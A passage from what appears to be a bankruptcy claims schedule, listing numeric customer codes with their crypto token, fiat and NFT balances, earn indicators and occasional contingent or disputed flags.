| 07327391 | | USD[10.00] | | |
| 07327392 | | USD[10.00] | | |
| 07327393 | | LINK[.42014566], USD[0.00] | Yes | |
| 07327394 | | USD[10.00] | | |
| 07327395 | | USD[10.00] | | |
| 07327396 | | DOGE[0], ETH[0.00000001], ETHW[0], SOL[0], USD[25002.01], USDT[0.00000001] | | |
| 07327397 | | USD[10.00] | | |
| 07327398 | | USD[10.00] | | |
| 07327399 | | BAT[1], CUSDT[3], ETH[1.09414564], ETHW[1.0936861], SUSHI[335.58228811], TRX[7], USD[0.00] | Yes | |
| 07327401 | | BTC[0], DOGE[0], ETH[0], USD[0.00] | | |
| 07327402 | | DOGE[1000.5608203], TRX[1], USD[0.00] | | |
| 07327403 | | SHIB[1], USD[0.00] | Yes | |
| 07327407 | | USD[10.00] | | |
| 07327408 | | BTC[0], ETH[0.00000576], LINK[0], LTC[0], MATIC[0], SHIB[1], SOL[0], SUSHI[0], USD[0.00], USDT[0] | Yes | |
| 07327409 | | TRX[.00000311], USD[0.18] | | |
| 07327410 | | BRZ[1], DOGE[.00000098], TRX[1], USD[0.00] | | |
| 07327411 | | DOGE[0], USD[0.00] | | |
| 07327412 | | DOGE[31.66660987], USD[0.00] | | |
| 07327413 | | USD[10.00] | | |
| 07327414 | | BRZ[0], GRT[0.00319297], USD[0.00] | | |
| 07327415 | | CUSDT[1], SHIB[522557.87227755], SOL[28.11348627], TRX[1], USD[0.01] | Yes | |
| 07327416 | | USD[10.00] | | |
| 07327417 | | USD[0.00] | | |
| 07327418 | | BRZ[1], CUSDT[2], TRX[3], USD[0.20] | Yes | |
| 07327421 | | USD[10.00] | | |
| 07327422 | | USD[10.00] | | |
| 07327423 | | USD[10.00] | | |
| 07327424 | | USD[10.00] | | |
| 07327425 | | USD[10.00] | | |
| 07327427 | | BTC[0], CUSDT[1], DOGE[1], USD[10.00] | | |
| 07327428 | | USD[10.00] | | |
| 07327429 | | BRZ[1], DOGE[.91996851], USD[0.01] | | |
| 07327431 | | USD[10.00] | | |
| 07327432 | | USD[10.00] | | |
| 07327433 | | USD[10.00] | | |
| 07327434 | | USD[10.00] | | |
| 07327435 | | USD[10.00] | | |
| 07327436 | | USD[10.00] | | |
| 07327437 | | BRZ[2], DOGE[2689.19545915], ETH[.00000162], ETHW[.00000162], GRT[4.38715694], TRX[2], USD[0.00] | Yes | |
| 07327438 | | USD[20.00] | | |
| 07327439 | | CUSDT[4], DOGE[1], SHIB[1], SUSHI[3.92008963], TRX[4.58307484], USD[0.86] | Yes | |
| 07327440 | | USD[10.00] | | |
| 07327441 | | BAT[25.51752390], BRZ[3], BTC[0.00043105], CUSDT[7], DOGE[630.60274299], ETH[0], ETHW[0], GRT[118.68915801], LINK[0.83491826], LTC[0.15090060], SOL[1.02369263], SUSHI[3.09822727], TRX[540.43551174], UNI[.68100773], USD[0.00], USDT[0.00000006] | | |
| 07327442 | | USD[10.00] | | |
| 07327443 | | DOGE[141.05944103], USD[0.00] | | |
| 07327444 | | USD[0.31] | Yes | |
| 07327445 | | CUSDT[2], TRX[2.00015758], USD[0.00] | | |
| 07327446 | | BTC[0], DOGE[0], ETH[0], USD[0.00] | | |
| 07327447 | | CUSDT[1], USD[0.02], USDT[0.00000001] | | |
| 07327448 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07327451 | | BAT[1], BRZ[1], DOGE[3], TRX[7], USD[10.00] | | |
| 07327452 | | DOGE[0], USD[0.00] | | |
| 07327453 | | BTC[0], CUSDT[1], USD[0.00] | Yes | |
| 07327455 | | BRZ[0], USD[0.00] | | |
| 07327456 | | USD[10.00] | | |
| 07327457 | | BTC[.00138792], DOGE[1669.66227725], USD[0.00] | Yes | |
| 07327458 | | DOGE[.00515292], USD[0.00] | | |
| 07327460 | | USD[10.00] | | |
| 07327461 | | DOGE[13.94936519], USD[0.00] | | |
| 07327462 | | USD[10.00] | | |
| 07327463 | | USD[10.00] | | |
| 07327464 | | USD[10.00] | | |
| 07327465 | | BRZ[1], BTC[0], CUSDT[43], DOGE[0], ETH[0], SHIB[3], TRX[34.02347164], USD[0.01], USDT[0] | Yes | |
| 07327466 | | DOGE[1], USD[0.00] | Yes | |
| 07327467 | | LTC[.00819923], USD[4.13] | | |
| 07327468 | | USD[0.00] | | |
| 07327469 | | USD[0.00] | | |
| 07327470 | | USD[10.00] | | |
| 07327471 | | BRZ[1], USD[0.00] | | |
| 07327472 | | ETH[.00619366], ETHW[.00611158], USD[0.00] | Yes | |
| 07327473 | | USD[10.00] | | |
| 07327474 | | USD[10.00] | | |
| 07327477 | | CUSDT[2], DOGE[8001.00003063], USD[0.01], USDT[1] | | |
| 07327478 | | DOGE[.825], TRX[.162], USD[0.87] | | |
| 07327479 | | USD[10.00] | | |
| 07327481 | | USD[10.00] | | |
| 07327483 | | BAT[1.0165555], BRZ[2], CUSDT[9], DOGE[1.008154], SHIB[19.64860665], TRX[5], USD[0.01] | Yes | |
| 07327484 | | BRZ[1], USD[0.00], USDT[0.00000001] | | |
| 07327485 | | BTC[.00054088], DOGE[1], ETH[0.02186980], ETHW[0.02186980], USD[10.00] | | |
| 07327486 | | USD[10.00] | | |
| 07327487 | | BTC[0], DOGE[12.20226459], USD[0.04] | | |
| 07327488 | | BTC[.00018328], USD[0.00] | | |
| 07327489 | | USD[10.00] | | |
| 07327490 | | USD[10.00] | | |
| 07327491 | | DOGE[0], GRT[0], LINK[0], SOL[0], TRX[1], USD[0.00] | | |
| 07327492 | | USD[0.70] | | |
| 07327493 | | BTC[0], CUSDT[522.41835347], DOGE[0], ETH[0], TRX[227.60576174], UNI[0], USD[0.00] | Yes | |
| 07327494 | | USD[10.00] | | |
| 07327495 | | BCH[.01334693], BTC[.00105525], CUSDT[3], DOGE[63.14396979], TRX[80.78782184], USD[8.37] | | |
| 07327496 | | USD[10.00] | | |
| 07327497 | | USD[10.00] | | |
| 07327498 | | BRZ[1], CUSDT[1], USD[0.01] | | |
| 07327499 | | DOGE[0], ETH[0], USD[0.00] | | |
| 07327500 | | USD[10.00] | | |
| 07327501 | | USD[10.00] | | |
| 07327502 | | USD[10.00] | | |
| 07327503 | | BAT[2.047477], BRZ[4], CUSDT[4], TRX[8], USD[0.01] | Yes | |
| 07327504 | | USD[10.00] | | |
| 07327506 | | USD[10.00] | | |
| 07327507 | | USD[0.00], USDT[0] | | |
| 07327508 | | CUSDT[1], DOGE[.00002737], TRX[1], USD[0.00], USDT[1] | | |
| 07327509 | | BAT[.15730023], BRZ[4], BTC[.0009707], CUSDT[35.43623046], TRX[.90647903], USD[0.01] | Yes | |
| 07327510 | | BRZ[1], CUSDT[4], TRX[1], USD[0.00], USDT[0] | | |
| 07327512 | | CUSDT[1], DOGE[113.56883446], TRX[1], USD[0.00] | | |
| 07327514 | | USD[10.00] | | |
| 07327515 | | BRZ[1], BTC[.00225693], CUSDT[12], ETHW[.07108804], TRX[1], USD[0.00] | Yes | |
| 07327516 | | USD[10.00] | | |
| 07327517 | | USD[15.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07327518 | | USD[10.00] | | |
| 07327519 | | USD[10.00] | | |
| 07327521 | | USD[10.00] | | |
| 07327522 | | USD[10.00] | | |
| 07327523 | | BTC[.00584237], CUSDT[4], DOGE[79.40659303], ETH[.04075333], ETHW[.04075333], SHIB[402900.88638195], SUSHI[11.06715809], TRX[1], USD[0.00] | | |
| 07327524 | | USD[10.00] | | |
| 07327525 | | USD[10.00] | | |
| 07327527 | | USD[10.00] | | |
| 07327528 | | CUSDT[2], TRX[2], USD[0.00] | | |
| 07327529 | | USD[10.00] | | |
| 07327531 | | USD[10.00] | | |
| 07327532 | | BAT[24.1334082], CUSDT[3], DOGE[462.73720327], ETH[.01264858], ETHW[.01249343], SHIB[1111258.59790015], USD[0.00] | Yes | |
| 07327533 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07327534 | | USD[10.00] | | |
| 07327535 | | USD[10.00] | | |
| 07327536 | | USD[10.00] | | |
| 07327537 | | BTC[0], CUSDT[2], DOGE[0], ETH[0], TRX[0], USD[0.00], USDT[0], YFI[0] | | |
| 07327538 | | USD[10.00] | | |
| 07327539 | | BRZ[1], BTC[.00014402], DOGE[.15946912], TRX[.2989517], UNI[1], USD[0.00] | | |
| 07327540 | | USD[10.00] | | |
| 07327541 | | DOGE[18.88727988], USD[0.00] | Yes | |
| 07327542 | | BTC[0], ETH[0], USD[0.00], USDT[0] | | |
| 07327543 | | BRZ[2], CUSDT[4], DOGE[1.00000948], TRX[2], USD[0.00] | Yes | |
| 07327544 | | USD[0.00] | | |
| 07327545 | | BTC[.00017678], TRX[1], USD[0.00] | | |
| 07327546 | | CUSDT[2], DOGE[308.91512795], MATIC[1.3135842], SOL[.51397165], USD[0.00] | | |
| 07327548 | | CUSDT[1], DOGE[.05001928], USD[0.00] | Yes | |
| 07327549 | | CUSDT[1], DOGE[1143.70798129], SOL[.32258777], USD[0.01] | | |
| 07327550 | | CUSDT[2], TRX[1], USD[0.01] | | |
| 07327551 | | USD[10.00] | | |
| 07327552 | | DOGE[0.00001498], USD[0.01] | | |
| 07327553 | | CUSDT[1], DOGE[1], TRX[1], USD[0.00] | | |
| 07327554 | | BTC[0], CUSDT[3], DOGE[0], ETH[0.04346946], ETHW[0.04293052], SOL[2.02613671], USD[0.00] | Yes | |
| 07327555 | | USD[10.00] | | |
| 07327556 | | USD[20.00] | | |
| 07327558 | | USD[10.00] | | |
| 07327559 | | USD[0.00] | | |
| 07327560 | | USD[11.01] | Yes | |
| 07327562 | | BRZ[2], CUSDT[3], DOGE[5296.18596157], SUSHI[.58168844], TRX[1], USD[0.01], USDT[2] | | |
| 07327565 | | BTC[0], USD[2165.63] | | |
| 07327566 | | USD[10.00] | | |
| 07327567 | | BTC[0], DOGE[.4] | | |
| 07327569 | | TRX[1], USD[929.60] | | |
| 07327570 | | USD[10.00] | | |
| 07327571 | | USD[10.00] | | |
| 07327572 | | USD[0.00] | | |
| 07327573 | | BRZ[2], BTC[.17755216], CUSDT[7], DOGE[0], ETH[1.14304380], ETHW[1.14256363], SHIB[1], SOL[22.26125319], TRX[1], USD[0.01], USDT[2.18368266], YFI[.02052555] | Yes | |
| 07327574 | | USD[10.00] | | |
| 07327575 | | DOGE[2769.5968475], KSHIB[0], SHIB[6573246.03665978], USD[0.00] | | |
| 07327576 | | BRZ[1], CUSDT[1], DOGE[1179.84910328], TRX[150.21024275], USD[0.00] | | |
| 07327578 | | USD[10.00] | | |
| 07327579 | | DOGE[20.06166542], MATIC[3.17866836], SHIB[4], SOL[.00000145], SUSHI[3.04798983], TRX[1], USD[0.00] | Yes | |
| 07327580 | | DAI[.00000001], DOGE[1], ETH[0], USD[0.00], USDT[0] | Yes | |
| 07327581 | | USD[10.00] | | |
| 07327582 | | USD[10.00] | | |
| 07327583 | Contingent, Disputed | BRZ[2], CUSDT[7], USD[0.00], USDT[0] | | |
| 07327584 | | USD[10.00] | | |
| 07327585 | | CUSDT[1], DOGE[1.00016699], TRX[3], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07327586 | | USD[10.00] | | |
| 07327587 | | USD[10.00] | | |
| 07327588 | | USD[10.00] | | |
| 07327589 | | USD[10.00] | | |
| 07327590 | | BTC[.00539234], CUSDT[11], DOGE[3449.49630061], ETH[.08182291], ETHW[.08182291], TRX[1], USD[508.43] | | |
| 07327591 | | DOGE[62.12276592], USD[7.15] | | |
| 07327592 | | USD[10.00] | | |
| 07327593 | | BRZ[1], CUSDT[11], DOGE[436.13866239], TRX[5], USD[0.00] | Yes | |
| 07327594 | | USD[10.00] | | |
| 07327595 | | CUSDT[3], DOGE[1], TRX[1], USD[0.00] | | |
| 07327596 | | DOGE[1], USD[0.02] | | |
| 07327599 | | DOGE[17.96607534], USD[0.00] | | |
| 07327600 | | USD[10.00] | | |
| 07327601 | | USD[10.00] | | |
| 07327602 | | USD[10.00] | | |
| 07327603 | | BF_POINT[200], DOGE[1808.38248259], SHIB[13837068.28032665], USD[0.00] | Yes | |
| 07327604 | | DOGE[0], TRX[3], USD[0.00] | | |
| 07327605 | | USD[10.00] | | |
| 07327606 | | CUSDT[1], DOGE[3.70594912], USD[0.06] | Yes | |
| 07327607 | | USD[5.24] | | |
| 07327608 | | USD[10.00] | | |
| 07327609 | | USD[10.00] | | |
| 07327610 | | USD[10.00] | | |
| 07327613 | | BRZ[3], CUSDT[26], DOGE[3], GRT[1], MATIC[7.86918645], SOL[.27748016], TRX[4], USD[0.00], USDT[1.08661577] | Yes | |
| 07327614 | | USD[10.00] | | |
| 07327615 | | BRZ[1], BTC[0], CUSDT[8], DOGE[1], ETH[0], LINK[0], LTC[0], TRX[0], USD[0.00], USDT[0.00000001] | | |
| 07327616 | | USD[10.00] | | |
| 07327617 | | CUSDT[4], DOGE[2243.49304064], SHIB[710749.22647569], TRX[925.83596525], USD[5.17] | | |
| 07327618 | | USD[210.00] | | |
| 07327619 | | USD[10.00] | | |
| 07327620 | | DOGE[1], USD[0.00] | | |
| 07327622 | | BTC[0], DOGE[1.85664616], USD[0.00] | Yes | |
| 07327623 | | SOL[.00325808], USD[0.00] | | |
| 07327624 | | USD[0.10] | | |
| 07327626 | | DOGE[32.30205828], USD[0.00] | | |
| 07327627 | | USD[10.00] | | |
| 07327628 | | ETH[.25404392], ETHW[.25404392], USD[0.00], USDT[0] | | |
| 07327629 | | BTC[.00563455], DOGE[921.65219489], USD[0.00] | | |
| 07327630 | | USD[10.48] | Yes | |
| 07327631 | | USD[10.00] | | |
| 07327632 | | DOGE[1], USD[0.01] | | |
| 07327634 | | DOGE[0], ETH[0], SOL[0.01797657], USD[0.00], USDT[0] | | |
| 07327635 | | DOGE[1], ETH[.01920423], ETHW[.01920423], USD[2.00] | | |
| 07327636 | | CUSDT[2311.42188703], DOGE[167.24209709], SOL[1.09742224], SUSHI[1.00698205], TRX[1], USD[0.29], USDT[1.98980899] | | |
| 07327637 | | CUSDT[1], USD[0.00] | | |
| 07327638 | | USD[10.00] | | |
| 07327639 | | USD[10.00] | | |
| 07327640 | | USD[0.00] | | |
| 07327641 | | CUSDT[22.27878486], DOGE[0], TRX[0], USD[0.00] | Yes | |
| 07327643 | | USD[10.00] | | |
| 07327644 | | BRZ[0], DOGE[1], ETH[0], ETHW[0], GRT[0], SOL[0.06389287], TRX[2], USD[0.19], USDT[0] | | |
| 07327645 | | CUSDT[4], DOGE[85.18576079], USD[0.06] | | |
| 07327646 | | DOGE[1], TRX[1], USD[0.00] | | |
| 07327650 | | USD[10.00] | | |
| 07327651 | | CUSDT[3], ETH[0], SUSHI[.02347532], USD[0.00] | | |
| 07327652 | | USD[10.00] | | |
| 07327653 | | BTC[.00000002], ETH[.00000031], ETHW[.00000031], TRX[1], USD[0.00] | Yes | |
| 07327654 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07327655 | | USD[10.00] | | |
| 07327656 | | USD[0.00] | Yes | |
| 07327657 | | USD[10.00] | | |
| 07327658 | | DOGE[880.27189395], ETH[.02874118], ETHW[.02874118], TRX[910.30940968], USD[0.00] | | |
| 07327659 | | DOGE[1.22245167], USD[0.00] | | |
| 07327661 | | USD[0.15] | | |
| 07327662 | | USD[10.00] | | |
| 07327663 | | USD[0.00] | | |
| 07327664 | | USD[14.89] | | |
| 07327665 | | BRZ[1], SHIB[1], USD[0.00], YFI[.00551685] | | |
| 07327666 | | USD[10.00] | | |
| 07327667 | | CUSDT[1], USD[0.01] | | |
| 07327671 | | BRZ[1], DOGE[3.22969958], SHIB[1], TRX[2], USD[0.09], USDT[0] | | |
| 07327672 | | BRZ[0], CUSDT[2], DOGE[3], GRT[2.01177309], SOL[0], TRX[1], USD[0.01], USDT[2.01040114] | | |
| 07327673 | | BAT[1], BRZ[3], CUSDT[9], GRT[1], TRX[8], USD[0.00], USDT[2] | | |
| 07327674 | | DOGE[1], USD[0.00] | | |
| 07327675 | | TRX[190.13850449], USD[0.00] | | |
| 07327676 | | USD[10.00] | | |
| 07327677 | | SHIB[782742.21551099], USD[0.00] | | |
| 07327679 | | BAT[1], CUSDT[1], TRX[1], USD[0.01] | | |
| 07327682 | | BRZ[1], CUSDT[3], DOGE[123.04997435], USD[0.00] | | |
| 07327684 | | USD[10.00] | | |
| 07327685 | | USD[10.00] | | |
| 07327686 | | CUSDT[1], TRX[1], USD[0.01] | | |
| 07327687 | | CUSDT[3], SHIB[3848590.00913404], TRX[1], USD[0.01] | | |
| 07327688 | | USD[10.00] | | |
| 07327689 | | BRZ[0], USD[0.01] | | |
| 07327690 | | USD[10.00] | | |
| 07327691 | | BTC[.00292738], DOGE[1], USD[10.00] | | |
| 07327692 | | BTC[.00481233], CUSDT[1], DOGE[423.00893991], ETH[.04444372], ETHW[.04389378], TRX[1], USD[0.00] | Yes | |
| 07327693 | | ETH[.00338698], ETHW[.00334594], USD[0.01] | Yes | |
| 07327694 | | BAT[13.13768804], BRZ[1], CUSDT[8], DOGE[271.11845732], ETH[.00777785], ETHW[.00768209], SHIB[342257.78020259], TRX[1.00001751], USD[0.01] | Yes | |
| 07327695 | | BRZ[1], CUSDT[3], DOGE[3], TRX[1], USD[0.00] | | |
| 07327696 | | USD[10.00] | | |
| 07327697 | | BRZ[3.28329686], BTC[.00024988], CUSDT[2], DOGE[0], USD[0.00] | Yes | |
| 07327699 | | DOGE[272.43167594], USD[10.00] | | |
| 07327700 | | USD[10.00] | | |
| 07327701 | | BTC[0], USD[0.19] | Yes | |
| 07327702 | | USD[10.87], USDT[0] | Yes | |
| 07327703 | | USD[0.00] | | |
| 07327704 | | CUSDT[1], DOGE[32.05352682], USD[0.00] | | |
| 07327705 | | USD[10.00] | | |
| 07327706 | | USD[10.00] | | |
| 07327707 | | USD[0.00] | Yes | |
| 07327708 | | USD[10.00] | | |
| 07327709 | | BRZ[0], USD[0.00] | | |
| 07327710 | | GRT[1], USD[0.01] | | |
| 07327711 | | USD[10.00] | | |
| 07327712 | | USD[10.00] | | |
| 07327713 | | USD[10.00] | | |
| 07327714 | | USD[10.00] | | |
| 07327715 | | USD[10.00] | | |
| 07327717 | | DOGE[0], USD[0.00], USDT[0] | | |
| 07327719 | | BRZ[3], CUSDT[2], DOGE[2124.49766557], ETH[.00002271], ETHW[.00002271], GRT[1], TRX[1], USD[0.01] | | |
| 07327722 | | USD[10.00] | | |
| 07327723 | | BRZ[1], DOGE[1], TRX[1], USD[0.00] | | |
| 07327724 | | USD[10.00] | | |
| 07327725 | | BRZ[.03707766], CUSDT[10.00742698], TRX[2.00059467], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07327727 | | USD[11.09] | Yes | |
| 07327728 | | USD[10.00] | | |
| 07327730 | | BRZ[0], BTC[0], DOGE[0], ETH[0], GRT[0], LTC[0], SOL[0], SUSHI[0], USD[0.01] | | |
| 07327731 | | SOL[0] | | |
| 07327732 | | BTC[.00005848], DOGE[.718], SOL[.431], USD[6.52] | | |
| 07327733 | | USD[10.00] | | |
| 07327734 | | USD[10.00] | | |
| 07327736 | | USD[10.00] | | |
| 07327737 | | BRZ[1], CUSDT[1], USD[0.01] | | |
| 07327738 | | USD[0.46], USDT[0.00368385] | | |
| 07327739 | | CUSDT[3], DOGE[.00000516], ETH[0.04020911], ETHW[0.04020911], USD[0.42] | | |
| 07327740 | | DOGE[88.15160999], ETH[.00524152], ETHW[.00524152], USD[0.63] | | |
| 07327741 | | USD[0.01], USDT[0] | Yes | |
| 07327742 | | USD[0.00] | | |
| 07327743 | | USD[10.00] | | |
| 07327744 | | DOGE[1], TRX[1], USD[0.01] | | |
| 07327745 | | USD[10.00] | | |
| 07327746 | | BTC[.00016024], USD[0.00] | | |
| 07327747 | | USD[10.00] | | |
| 07327748 | | CUSDT[1], DOGE[1], SHIB[2], USD[129.10] | Yes | |
| 07327749 | | USD[10.00] | | |
| 07327750 | | USD[0.03] | | |
| 07327751 | | CUSDT[3], DOGE[2157.14252546], SHIB[348480.62447727], USD[0.00] | | |
| 07327755 | | USD[0.00] | Yes | |
| 07327756 | | DOGE[401.391], USD[0.02] | | |
| 07327757 | | BTC[0], SHIB[1789.3728395], USD[0.00] | Yes | |
| 07327758 | | BAT[1], BRZ[1], CUSDT[3], TRX[4], USD[0.01], USDT[2] | | |
| 07327759 | | USD[0.00] | | |
| 07327760 | | USD[10.00] | | |
| 07327761 | | BRZ[1], TRX[2], USD[0.01] | | |
| 07327762 | | CUSDT[1], DOGE[3518.99917739], USD[0.00] | | |
| 07327763 | | CUSDT[2], DOGE[272.80119923], USD[0.00] | | |
| 07327764 | | USD[10.00] | | |
| 07327765 | | DOGE[119.34281004], TRX[35.36692996], USD[0.00] | Yes | |
| 07327766 | | DOGE[1], USD[0.00], USDT[1] | | |
| 07327768 | | CUSDT[2], ETH[.00000007], ETHW[.00000007], USD[0.00] | Yes | |
| 07327769 | | USD[10.00] | | |
| 07327771 | | USD[10.00] | | |
| 07327772 | | BTC[.00022478], CUSDT[5], USD[0.00] | | |
| 07327773 | | BRZ[1], BTC[0], CUSDT[1], ETH[0], GRT[1], TRX[2], USD[0.00], USDT[0] | | |
| 07327774 | | DOGE[186.95841652], TRX[1], USD[0.00] | | |
| 07327775 | | DOGE[1], SUSHI[1.59538381], TRX[1], USD[0.00] | | |
| 07327776 | | USD[10.00] | | |
| 07327778 | | BTC[0], CUSDT[2], GRT[0], USD[0.00] | | |
| 07327779 | | BAT[1.01340796], BTC[.00095438], CUSDT[3], DOGE[3], SOL[.00109277], UNI[.48817555], USD[0.00] | Yes | |
| 07327780 | | BAT[1], BRZ[1], CUSDT[14], DOGE[1], SHIB[4843071.44055614], TRX[6.00000409], USD[0.01], USDT[1] | | |
| 07327782 | | BAT[0.01278588], BCH[.00015472], BTC[.00000012], SOL[.00169108], SUSHI[.41584633], USD[2598.86] | Yes | |
| 07327783 | | BTC[.02299385], DOGE[4195.273], ETH[.012866], ETHW[.012866], LTC[1.17084925], SUSHI[30.906], USD[4.11], USDT[.2719796] | | |
| 07327784 | | USD[10.00] | | |
| 07327785 | | BAT[5752.46179229], ETH[.00290188], ETHW[.00290188], USD[0.05] | | |
| 07327786 | | SOL[1.11526393], USD[15.32] | Yes | |
| 07327787 | | BCH[0], BTC[0], DOGE[0], ETH[0], LTC[0.20924016], USD[0.06] | | |
| 07327789 | | USD[10.00] | | |
| 07327790 | | USD[10.00] | | |
| 07327791 | | USD[249.18] | | |
| 07327792 | | USD[10.00] | | |
| 07327793 | | USD[10.00] | | |
| 07327794 | | BAT[2], BRZ[1], BTC[.00148254], CUSDT[3], DOGE[11472.70305342], TRX[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07327796 | | USD[0.00], USDT[0] | | |
| 07327797 | | USD[10.00] | | |
| 07327798 | | USD[10.00] | | |
| 07327799 | | CUSDT[6], DOGE[0], MATIC[0], SHIB[0], SOL[0.05583068], SUSHI[.00000121], USD[0.00], USDT[0.00000009] | Yes | |
| 07327800 | | USD[10.00] | | |
| 07327802 | | USD[0.01] | | |
| 07327805 | | BRZ[1], CUSDT[2], TRX[1], USD[0.01] | | |
| 07327806 | | CUSDT[39.11822011], KSHIB[159.66880643], TRX[1], USD[0.00] | Yes | |
| 07327807 | | USD[10.00] | | |
| 07327808 | | BTC[.00019013], CUSDT[1], DOGE[817.16860676], USD[0.01] | | |
| 07327809 | | BAT[0], BTC[0], CUSDT[3], DOGE[0], GRT[0], KSHIB[5.340654], MATIC[0], SHIB[1], TRX[0], USD[0.00] | Yes | |
| 07327810 | | BAT[4.43370024], BRZ[6.65055038], CUSDT[6], DOGE[2], GRT[2.08215346], SUSHI[1.10817207], TRX[1], USD[0.00] | Yes | |
| 07327811 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07327812 | | BTC[0.00147523], CUSDT[4], SUSHI[0], TRX[4], USD[0.00], USDT[0] | | |
| 07327813 | | DOGE[29.93601924], USD[0.00] | | |
| 07327814 | | DOGE[1], ETH[.0000151], NFT [335647842535474129/Good Boy #248][1], USD[0.00], YFI[.00000001] | Yes | |
| 07327815 | | CUSDT[3], USD[0.01], USDT[0] | | |
| 07327817 | | USD[10.00] | | |
| 07327818 | | USD[10.00] | | |
| 07327819 | | USD[10.00] | | |
| 07327821 | | DOGE[5.90197894], USD[0.00] | | |
| 07327822 | | DOGE[184.76868915], ETH[.01231757], ETHW[.01231757], TRX[70.46740111], USD[0.00] | | |
| 07327825 | | CUSDT[1], DOGE[1.0776616], TRX[2], USD[0.00] | | |
| 07327827 | | USD[0.00] | Yes | |
| 07327828 | | BRZ[1], CUSDT[1], DOGE[0], ETH[0], ETHW[0], USD[10.00] | | |
| 07327829 | | USD[10.27] | | |
| 07327830 | | BRZ[0], CUSDT[1], DOGE[0], USD[0.01] | | |
| 07327831 | | USD[10.00] | | |
| 07327832 | | CUSDT[3], DOGE[1], ETH[0.10824115], ETHW[0.15820792], SHIB[4], USD[0.01], USDT[0.00000412] | Yes | |
| 07327833 | | TRX[68.90202099], USD[0.00] | | |
| 07327834 | | TRX[2], USD[0.49] | | |
| 07327835 | | BRZ[1], CUSDT[1], DOGE[1], USD[1.00] | | |
| 07327836 | | USD[10.00] | | |
| 07327837 | | CUSDT[4], DOGE[.00161178], ETH[.00000004], ETHW[.00000004], TRX[9.76070968], USD[0.01] | | |
| 07327838 | | CUSDT[2], DOGE[2948.95631568], USD[0.00] | | |
| 07327839 | | USD[0.01] | | |
| 07327840 | | USD[10.00] | | |
| 07327841 | | USD[10.00] | | |
| 07327842 | | USD[10.00] | | |
| 07327843 | | USD[85.51], USDT[0] | | |
| 07327845 | | CUSDT[1], DOGE[.00089653], USD[0.00] | | |
| 07327846 | | USD[10.00] | | |
| 07327847 | | USD[10.00] | | |
| 07327848 | | BRZ[1], CUSDT[7], DOGE[628.81060933], USD[0.01] | Yes | |
| 07327849 | | BTC[.00535362], CUSDT[2], DOGE[263.15846287], EUR[0.12], GBP[0.00], TRX[3], USD[0.02] | Yes | |
| 07327850 | | USD[10.00] | | |
| 07327851 | | BRZ[1], BTC[0], CUSDT[2], DOGE[1], SHIB[1], TRX[1], USD[0.01] | | |
| 07327852 | | USD[10.00] | | |
| 07327853 | | BAT[2], BRZ[4], CUSDT[2], DOGE[5001.93463456], SOL[13.17625896], TRX[5], USD[0.00], USDT[1] | | |
| 07327854 | | CUSDT[2], TRX[2.00993053], USD[0.00] | Yes | |
| 07327855 | | BRZ[1], CUSDT[1], TRX[1], USD[0.00] | Yes | |
| 07327856 | | NFT [547343993042237257/Coachella x FTX Weekend 2 #27490][1] | | |
| 07327857 | | BAT[60.74798182], BTC[.00089842], CUSDT[4], DOGE[4245.32710077], ETH[0.07656653], ETHW[0.07561668], LTC[.33890847], SHIB[0], SOL[.21382646], USD[452.28] | Yes | |
| 07327858 | | USD[10.00] | | |
| 07327860 | | BAT[1.0165555], BTC[.00726724], CUSDT[1], DOGE[926.36323157], GRT[82.96876298], TRX[3], USD[8.97] | Yes | |
| 07327861 | | USD[29.25] | | |
| 07327862 | | BRZ[1], CUSDT[3], DOGE[247.57508308], TRX[1], USD[0.00], USDT[1.10515011] | Yes | |
| 07327865 | | BRZ[7], CUSDT[11], DOGE[5], TRX[2], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07327866 | | USD[10.00] | | |
| 07327867 | | USD[0.01], USDT[0] | Yes | |
| 07327868 | | DOGE[0], ETH[0.05876753], ETHW[0.05876753], USD[5.14] | | |
| 07327869 | | USD[10.00] | | |
| 07327870 | | BAT[2], CUSDT[2], TRX[3], USD[0.00] | | |
| 07327872 | | USD[10.00] | | |
| 07327873 | | BRZ[.2505752], CUSDT[11], DOGE[27.4465975], SHIB[134302.78682625], TRX[1], USD[0.00] | Yes | |
| 07327874 | | USD[10.00] | | |
| 07327875 | | DOGE[1826.664], USD[2.39] | | |
| 07327876 | | GRT[5.10670915], USD[0.00] | | |
| 07327877 | | DOGE[1], USD[0.00] | | |
| 07327878 | | BAT[1.0165555], BRZ[4], CUSDT[7], TRX[2], USD[0.14] | Yes | |
| 07327879 | | CUSDT[1], USD[0.01] | | |
| 07327880 | | BTC[.00038394], CUSDT[3], DOGE[6.19963908], SHIB[328.28553837], TRX[4], USD[0.00] | | |
| 07327881 | | BRZ[2], CUSDT[3], DOGE[5], GRT[63.08586432], USD[0.00], USDT[0] | | |
| 07327882 | | BRZ[2], CUSDT[4], DOGE[10472.10935034], ETH[.05481424], ETHW[.0541312], MKR[.04706667], SUSHI[26.18587099], TRX[1813.04823549], USD[0.00] | Yes | |
| 07327884 | | USD[10.00] | | |
| 07327885 | | USD[10.00] | | |
| 07327886 | | USD[10.00] | | |
| 07327887 | | USD[0.12] | | |
